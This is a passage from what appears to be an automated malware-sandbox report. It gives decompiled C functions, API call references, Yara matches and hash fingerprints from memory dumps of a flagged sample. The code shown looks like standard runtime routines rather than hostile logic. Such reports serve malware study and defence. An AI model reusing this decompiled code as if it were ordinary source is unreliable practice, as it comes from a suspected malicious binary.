                                                                                              					_pop(_t7);
                                                                                              					__eflags = _t6;
                                                                                              					if(_t6 == 0) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t4;
                                                                                              			}








                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                              • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                                              • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                              • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `5(r
                                                                                              • API String ID: 0-3683955166
                                                                                              • Instruction Fuzzy Hash: 70F03278C0A3889FCB169FB885146AEBFB0EF06209F2009EEC440A3252D7B59A54CB15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 101f49cf15c7f1941b39a9879d459172216f5371a67d499c0f286bff78a45285
                                                                                              • Instruction ID: a3a26db0c89090305372eccc0df68bc80a181ecad8dda9728b4b49f00e343d87
                                                                                              • Opcode Fuzzy Hash: 101f49cf15c7f1941b39a9879d459172216f5371a67d499c0f286bff78a45285
                                                                                              • Instruction Fuzzy Hash: 76F08270D112099ADB589FB5C869BFFBAF5DB49304F105839E001B3280DAB55944CBE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291070754.00000000023C0000.00000040.00000040.sdmp, Offset: 023C0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 693b7c54016a59cdbfed5bf97d611671327a7796b2b33607a59a4987e9e37b45
                                                                                              • Instruction ID: 055e7503964e019b034673bd663d52f0d08475d7c6aca62c63d1762b3744ca4e
                                                                                              • Opcode Fuzzy Hash: 693b7c54016a59cdbfed5bf97d611671327a7796b2b33607a59a4987e9e37b45
                                                                                              • Instruction Fuzzy Hash: 33F01935208645DFC706CF00D940B26FBA6EB89718F24C6ADE9490BB62C337E913DB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b0f6473424c3c65b1e7179b416a0a09d92f16fa434046f156b502bf0841e0af5
                                                                                              • Instruction ID: 7609e76018df690e9d11d7eb82463d74572459893b5ea69ff3d762f6a550f1d8
                                                                                              • Opcode Fuzzy Hash: b0f6473424c3c65b1e7179b416a0a09d92f16fa434046f156b502bf0841e0af5
                                                                                              • Instruction Fuzzy Hash: BFF03030901108EFC704EFB4C556A6EBB71EF86216F2020A8D846733A0DB716E50DB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d9ce2f74793a8392c5619d0ccf39d762bd1fb0ac72ab9d8fc5689b6fbf225f7
                                                                                              • Instruction ID: 7de9a37097ab67641c5084c10e99b89a1bc22cc16ce9b9c1ed1f55ca26cfd88a
                                                                                              • Opcode Fuzzy Hash: 7d9ce2f74793a8392c5619d0ccf39d762bd1fb0ac72ab9d8fc5689b6fbf225f7
                                                                                              • Instruction Fuzzy Hash: B9F08C3880A388DFCB0AEF789410699BFB19F03305F1451EAC8846B652D2714A41EB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291070754.00000000023C0000.00000040.00000040.sdmp, Offset: 023C0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f9a2acdc1b12aab3d94565e21e8df86c4b446cbb904c817a968617dd458edfe2
                                                                                              • Instruction ID: 2c4cea7f25b782e487e4c196227ccf4a67197186522091fd91826bbcad80b6b7
                                                                                              • Opcode Fuzzy Hash: f9a2acdc1b12aab3d94565e21e8df86c4b446cbb904c817a968617dd458edfe2
                                                                                              • Instruction Fuzzy Hash: 2BE0EDB66446049B9650CF0AEC81462FBE8EB84631B18C46BDC0D9B711E676B5098AA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7f7d21cc7e8f27f37dd4e5f73e599bccd59555acb1152e95ab5816fa6e53cf1e
                                                                                              • Instruction ID: 680f1a480f222f92f80fbd7c1e2c05a8dee95c83035ba660b2657d2f061e3026
                                                                                              • Opcode Fuzzy Hash: 7f7d21cc7e8f27f37dd4e5f73e599bccd59555acb1152e95ab5816fa6e53cf1e
                                                                                              • Instruction Fuzzy Hash: 15F0A938809384DFCB2AEFB496186ACBFB1EB07300F1051F6C88097362D2714E45DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 92565d7bcdfbd0f4b1522754eebb9aeaf6c5afad725d6b012bc8629f26687e9d
                                                                                              • Instruction ID: 04f4fbbad4ca10343e743e34ded9502ba46a0d8beb6bb2dc5b33d3c5af618741
                                                                                              • Opcode Fuzzy Hash: 92565d7bcdfbd0f4b1522754eebb9aeaf6c5afad725d6b012bc8629f26687e9d
                                                                                              • Instruction Fuzzy Hash: 44F01574C01208DFCB14EFB8D5086AEBBB5FB05305F2049A9C81063310DBB69A50CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cd1fe6e1c800fab3f00a08726a91e37d57b3f417b13bd27d220040719130e267
                                                                                              • Instruction ID: 49d23843cda3917fb8267a79394ed7a6dc5bed6a88fdaf5de7a015943490456e
                                                                                              • Opcode Fuzzy Hash: cd1fe6e1c800fab3f00a08726a91e37d57b3f417b13bd27d220040719130e267
                                                                                              • Instruction Fuzzy Hash: BEE04F7140E3849FD7169F748851666BF71DB03305F0511EAC4C45B252C6765941E7A6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 61c47414cb8b16826ab1b82393ba37dfc1f3ea08bc7e992b2c64b4018b26b317
                                                                                              • Instruction ID: 0a3bc0a6470cc132d5f4b4ade9588fd6537e9b152bda8108629d23a035e4c62a
                                                                                              • Opcode Fuzzy Hash: 61c47414cb8b16826ab1b82393ba37dfc1f3ea08bc7e992b2c64b4018b26b317
                                                                                              • Instruction Fuzzy Hash: 90E04634E41208DFC704EFA8C589AADBBB1EF06305F1011E9D84463361DB71AE40CBAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: faf8c4ff0285c9f9b21b7918cc6129fb1bb41834905d06f7bc8e39f1752e2ffb
                                                                                              • Instruction ID: a61a9d57eccefae9a7a5d2aa2df0c1544ad1e2c1cb13141b897b197ed26053fc
                                                                                              • Opcode Fuzzy Hash: faf8c4ff0285c9f9b21b7918cc6129fb1bb41834905d06f7bc8e39f1752e2ffb
                                                                                              • Instruction Fuzzy Hash: 33E04F34905308DFCB18DFA9D6487ACBBB5EB45305F1051B9D84453311D7715E40CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 92ef78bdbf4a8fbf32a10e6643254c27742173d980356d8ca3c58d120f05605f
                                                                                              • Instruction ID: 9a3c7c386403375889c15a99c6ad94547d9b922631d30c4caba70999201b6d18
                                                                                              • Opcode Fuzzy Hash: 92ef78bdbf4a8fbf32a10e6643254c27742173d980356d8ca3c58d120f05605f
                                                                                              • Instruction Fuzzy Hash: 10D01736D00208CFCB048FE4E0443EDF774EB8A329F20942AC118B3200C7318485CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a1c0b2ab9d94b063772c2c054857174669909b6576f85061c3f1111e6559a624
                                                                                              • Instruction ID: a0c98bc5bebe808cd1a61e1feb3136afa242935950f34e2e5d691d71d51834e0
                                                                                              • Opcode Fuzzy Hash: a1c0b2ab9d94b063772c2c054857174669909b6576f85061c3f1111e6559a624
                                                                                              • Instruction Fuzzy Hash: A9D0A971806308DBC728EFA49804B2AB339DB02709F1010BED404233008BB2AA00D6AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2d9a6981df14dd1018cffc16315dccfaab30a231ae86cd43b67e7a730cd0990f
                                                                                              • Instruction ID: a39546fc7069d0847c23d85012fd845f9aed9986e197f7260df748c76c33d2cf
                                                                                              • Opcode Fuzzy Hash: 2d9a6981df14dd1018cffc16315dccfaab30a231ae86cd43b67e7a730cd0990f
                                                                                              • Instruction Fuzzy Hash: 34D0C936E01208CF8B108FE9E4401DCF775EB8E239F209466C518B3310C7329455CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290752466.0000000000C52000.00000040.00000001.sdmp, Offset: 00C52000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5646c19defc2a08c7ae8f30271a4e9ff198cf348df9a046388e725802a9dbd5a
                                                                                              • Instruction ID: c2ae258a6274e5d466e742ebd83c81ee569c777681d43b71a07a3e8568ee9f93
                                                                                              • Opcode Fuzzy Hash: 5646c19defc2a08c7ae8f30271a4e9ff198cf348df9a046388e725802a9dbd5a
                                                                                              • Instruction Fuzzy Hash: 07D05EB9204A814FD3268A1CC1A4B953BD4EF52B05F4684F9AC008B6A3C768DAC5E200
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290752466.0000000000C52000.00000040.00000001.sdmp, Offset: 00C52000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: af58af32284707734a1ec118236c1f0427557ebbce583eb1866684ad5e5cdb17
                                                                                              • Instruction ID: 4bf9d63b462fcd0cef016daebd21a2f9cfee42ca39b2bfaf6212b1ce4f189cfb
                                                                                              • Opcode Fuzzy Hash: af58af32284707734a1ec118236c1f0427557ebbce583eb1866684ad5e5cdb17
                                                                                              • Instruction Fuzzy Hash: 03D05E782002814BC715DB1CC294F5937D8AB41B01F0644E8AC108B272C7B8EDC5C600
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              C-Code - Quality: 100%
                                                                                              			E004067FE() {
                                                                                              				signed int _t3;
                                                                                              
                                                                                              				_t3 = GetProcessHeap();
                                                                                              				 *0x4132b0 = _t3;
                                                                                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                              			}




                                                                                              0x004067fe
                                                                                              0x00406806
                                                                                              0x0040680e

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 70%
                                                                                              			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				void* _v24;
                                                                                              				signed int _t49;
                                                                                              				signed int _t54;
                                                                                              				int _t56;
                                                                                              				signed int _t58;
                                                                                              				short* _t60;
                                                                                              				signed int _t64;
                                                                                              				short* _t68;
                                                                                              				int _t76;
                                                                                              				short* _t79;
                                                                                              				signed int _t85;
                                                                                              				signed int _t88;
                                                                                              				void* _t93;
                                                                                              				void* _t94;
                                                                                              				int _t96;
                                                                                              				short* _t99;
                                                                                              				int _t101;
                                                                                              				int _t103;
                                                                                              				signed int _t104;
                                                                                              				short* _t105;
                                                                                              				void* _t108;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_push(__ecx);
                                                                                              				_t49 =  *0x412014; // 0x7e6e3832
                                                                                              				_v8 = _t49 ^ _t104;
                                                                                              				_t101 = _a20;
                                                                                              				if(_t101 > 0) {
                                                                                              					_t76 = E004080D8(_a16, _t101);
                                                                                              					_t108 = _t76 - _t101;
                                                                                              					_t4 = _t76 + 1; // 0x1
                                                                                              					_t101 = _t4;
                                                                                              					if(_t108 >= 0) {
                                                                                              						_t101 = _t76;
                                                                                              					}
                                                                                              				}
                                                                                              				_t96 = _a32;
                                                                                              				if(_t96 == 0) {
                                                                                              					_t96 =  *( *_a4 + 8);
                                                                                              					_a32 = _t96;
                                                                                              				}
                                                                                              				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                                                                              				_v12 = _t54;
                                                                                              				if(_t54 == 0) {
                                                                                              					L38:
                                                                                              					E004018CC();
                                                                                              					return _t54;
                                                                                              				} else {
                                                                                              					_t93 = _t54 + _t54;
                                                                                              					_t83 = _t93 + 8;
                                                                                              					asm("sbb eax, eax");
                                                                                              					if((_t93 + 0x00000008 & _t54) == 0) {
                                                                                              						_t79 = 0;
                                                                                              						__eflags = 0;
                                                                                              						L14:
                                                                                              						if(_t79 == 0) {
                                                                                              							L36:
                                                                                              							_t103 = 0;
                                                                                              							L37:
                                                                                              							E004063D5(_t79);
                                                                                              							_t54 = _t103;
                                                                                              							goto L38;
                                                                                              						}
                                                                                              						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                                                                              						_t119 = _t56;
                                                                                              						if(_t56 == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						_t98 = _v12;
                                                                                              						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                                                                              						_t103 = _t58;
                                                                                              						if(_t103 == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						if((_a12 & 0x00000400) == 0) {
                                                                                              							_t94 = _t103 + _t103;
                                                                                              							_t85 = _t94 + 8;
                                                                                              							__eflags = _t94 - _t85;
                                                                                              							asm("sbb eax, eax");
                                                                                              							__eflags = _t85 & _t58;
                                                                                              							if((_t85 & _t58) == 0) {
                                                                                              								_t99 = 0;
                                                                                              								__eflags = 0;
                                                                                              								L30:
                                                                                              								__eflags = _t99;
                                                                                              								if(__eflags == 0) {
                                                                                              									L35:
                                                                                              									E004063D5(_t99);
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                                                                              								__eflags = _t60;
                                                                                              								if(_t60 == 0) {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								_push(0);
                                                                                              								_push(0);
                                                                                              								__eflags = _a28;
                                                                                              								if(_a28 != 0) {
                                                                                              									_push(_a28);
                                                                                              									_push(_a24);
                                                                                              								} else {
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              								}
                                                                                              								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                                                                              								__eflags = _t103;
                                                                                              								if(_t103 != 0) {
                                                                                              									E004063D5(_t99);
                                                                                              									goto L37;
                                                                                              								} else {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              							}
                                                                                              							_t88 = _t94 + 8;
                                                                                              							__eflags = _t94 - _t88;
                                                                                              							asm("sbb eax, eax");
                                                                                              							_t64 = _t58 & _t88;
                                                                                              							_t85 = _t94 + 8;
                                                                                              							__eflags = _t64 - 0x400;
                                                                                              							if(_t64 > 0x400) {
                                                                                              								__eflags = _t94 - _t85;
                                                                                              								asm("sbb eax, eax");
                                                                                              								_t99 = E00403E3D(_t85, _t64 & _t85);
                                                                                              								_pop(_t85);
                                                                                              								__eflags = _t99;
                                                                                              								if(_t99 == 0) {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								 *_t99 = 0xdddd;
                                                                                              								L28:
                                                                                              								_t99 =  &(_t99[4]);
                                                                                              								goto L30;
                                                                                              							}
                                                                                              							__eflags = _t94 - _t85;
                                                                                              							asm("sbb eax, eax");
                                                                                              							E004018E0();
                                                                                              							_t99 = _t105;
                                                                                              							__eflags = _t99;
                                                                                              							if(_t99 == 0) {
                                                                                              								goto L35;
                                                                                              							}
                                                                                              							 *_t99 = 0xcccc;
                                                                                              							goto L28;
                                                                                              						}
                                                                                              						_t68 = _a28;
                                                                                              						if(_t68 == 0) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						_t123 = _t103 - _t68;
                                                                                              						if(_t103 > _t68) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                                                                              						if(_t103 != 0) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						goto L36;
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t70 = _t54 & _t93 + 0x00000008;
                                                                                              					_t83 = _t93 + 8;
                                                                                              					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                                                                              						__eflags = _t93 - _t83;
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t79 = E00403E3D(_t83, _t70 & _t83);
                                                                                              						_pop(_t83);
                                                                                              						__eflags = _t79;
                                                                                              						if(__eflags == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						 *_t79 = 0xdddd;
                                                                                              						L12:
                                                                                              						_t79 =  &(_t79[4]);
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					E004018E0();
                                                                                              					_t79 = _t105;
                                                                                              					if(_t79 == 0) {
                                                                                              						goto L36;
                                                                                              					}
                                                                                              					 *_t79 = 0xcccc;
                                                                                              					goto L12;
                                                                                              				}
                                                                                              			}


























                                                                                              0x00407ac5
                                                                                              0x004079af
                                                                                              0x004079b5
                                                                                              0x004079b7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079bd
                                                                                              0x004079cf
                                                                                              0x004079d4
                                                                                              0x004079d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079e5
                                                                                              0x00407a1f
                                                                                              0x00407a22
                                                                                              0x00407a25
                                                                                              0x00407a27
                                                                                              0x00407a29
                                                                                              0x00407a2b
                                                                                              0x00407a77
                                                                                              0x00407a77
                                                                                              0x00407a79
                                                                                              0x00407a79
                                                                                              0x00407a7b
                                                                                              0x00407ab5
                                                                                              0x00407ab6
                                                                                              0x00000000
                                                                                              0x00407abb
                                                                                              0x00407a8f
                                                                                              0x00407a94
                                                                                              0x00407a96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a9a
                                                                                              0x00407a9b
                                                                                              0x00407a9c
                                                                                              0x00407a9f
                                                                                              0x00407adb
                                                                                              0x00407ade
                                                                                              0x00407aa1
                                                                                              0x00407aa1
                                                                                              0x00407aa2
                                                                                              0x00407aa2
                                                                                              0x00407aaf
                                                                                              0x00407ab1
                                                                                              0x00407ab3
                                                                                              0x00407ae4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407ab3
                                                                                              0x00407a2d
                                                                                              0x00407a30
                                                                                              0x00407a32
                                                                                              0x00407a34
                                                                                              0x00407a36
                                                                                              0x00407a39
                                                                                              0x00407a3e
                                                                                              0x00407a59
                                                                                              0x00407a5b
                                                                                              0x00407a65
                                                                                              0x00407a67
                                                                                              0x00407a68
                                                                                              0x00407a6a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a6c
                                                                                              0x00407a72
                                                                                              0x00407a72
                                                                                              0x00000000
                                                                                              0x00407a72
                                                                                              0x00407a40
                                                                                              0x00407a42
                                                                                              0x00407a46
                                                                                              0x00407a4b
                                                                                              0x00407a4d
                                                                                              0x00407a4f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x004079e7
                                                                                              0x004079ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079f2
                                                                                              0x004079f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a10
                                                                                              0x00407a14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a1a
                                                                                              0x0040794d
                                                                                              0x0040794f
                                                                                              0x00407951
                                                                                              0x00407959
                                                                                              0x00407978
                                                                                              0x0040797a
                                                                                              0x00407984
                                                                                              0x00407986
                                                                                              0x00407987
                                                                                              0x00407989
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040798f
                                                                                              0x00407995
                                                                                              0x00407995
                                                                                              0x00000000
                                                                                              0x00407995
                                                                                              0x0040795d
                                                                                              0x00407961
                                                                                              0x00407966
                                                                                              0x0040796a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407970
                                                                                              0x00000000
                                                                                              0x00407970

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407961
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                                              • __freea.LIBCMT ref: 00407AB6
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              • __freea.LIBCMT ref: 00407ABF
                                                                                              • __freea.LIBCMT ref: 00407AE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3864826663-0
                                                                                              • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                                              • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                              				signed int _v8;
                                                                                              				signed char _v15;
                                                                                              				char _v16;
                                                                                              				void _v24;
                                                                                              				short _v28;
                                                                                              				char _v31;
                                                                                              				void _v32;
                                                                                              				long _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				void* _v44;
                                                                                              				signed int _v48;
                                                                                              				signed char* _v52;
                                                                                              				long _v56;
                                                                                              				int _v60;
                                                                                              				void* __ebx;
                                                                                              				signed int _t78;
                                                                                              				signed int _t80;
                                                                                              				int _t86;
                                                                                              				void* _t93;
                                                                                              				long _t96;
                                                                                              				void _t104;
                                                                                              				void* _t111;
                                                                                              				signed int _t115;
                                                                                              				signed int _t118;
                                                                                              				signed char _t123;
                                                                                              				signed char _t128;
                                                                                              				intOrPtr _t129;
                                                                                              				signed int _t131;
                                                                                              				signed char* _t133;
                                                                                              				intOrPtr* _t136;
                                                                                              				signed int _t138;
                                                                                              				void* _t139;
                                                                                              
                                                                                              				_t78 =  *0x412014; // 0x7e6e3832
                                                                                              				_v8 = _t78 ^ _t138;
                                                                                              				_t80 = _a8;
                                                                                              				_t118 = _t80 >> 6;
                                                                                              				_t115 = (_t80 & 0x0000003f) * 0x30;
                                                                                              				_t133 = _a12;
                                                                                              				_v52 = _t133;
                                                                                              				_v48 = _t118;
                                                                                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                                                                              				_v40 = _a16 + _t133;
                                                                                              				_t86 = GetConsoleCP();
                                                                                              				_t136 = _a4;
                                                                                              				_v60 = _t86;
                                                                                              				 *_t136 = 0;
                                                                                              				 *((intOrPtr*)(_t136 + 4)) = 0;
                                                                                              				 *((intOrPtr*)(_t136 + 8)) = 0;
                                                                                              				while(_t133 < _v40) {
                                                                                              					_v28 = 0;
                                                                                              					_v31 =  *_t133;
                                                                                              					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                                                                              					_t123 =  *(_t129 + _t115 + 0x2d);
                                                                                              					if((_t123 & 0x00000004) == 0) {
                                                                                              						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                              							_push(1);
                                                                                              							_push(_t133);
                                                                                              							goto L8;
                                                                                              						} else {
                                                                                              							if(_t133 >= _v40) {
                                                                                              								_t131 = _v48;
                                                                                              								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                                                                              								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                                                                              								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                                              							} else {
                                                                                              								_t111 = E00407222( &_v28, _t133, 2);
                                                                                              								_t139 = _t139 + 0xc;
                                                                                              								if(_t111 != 0xffffffff) {
                                                                                              									_t133 =  &(_t133[1]);
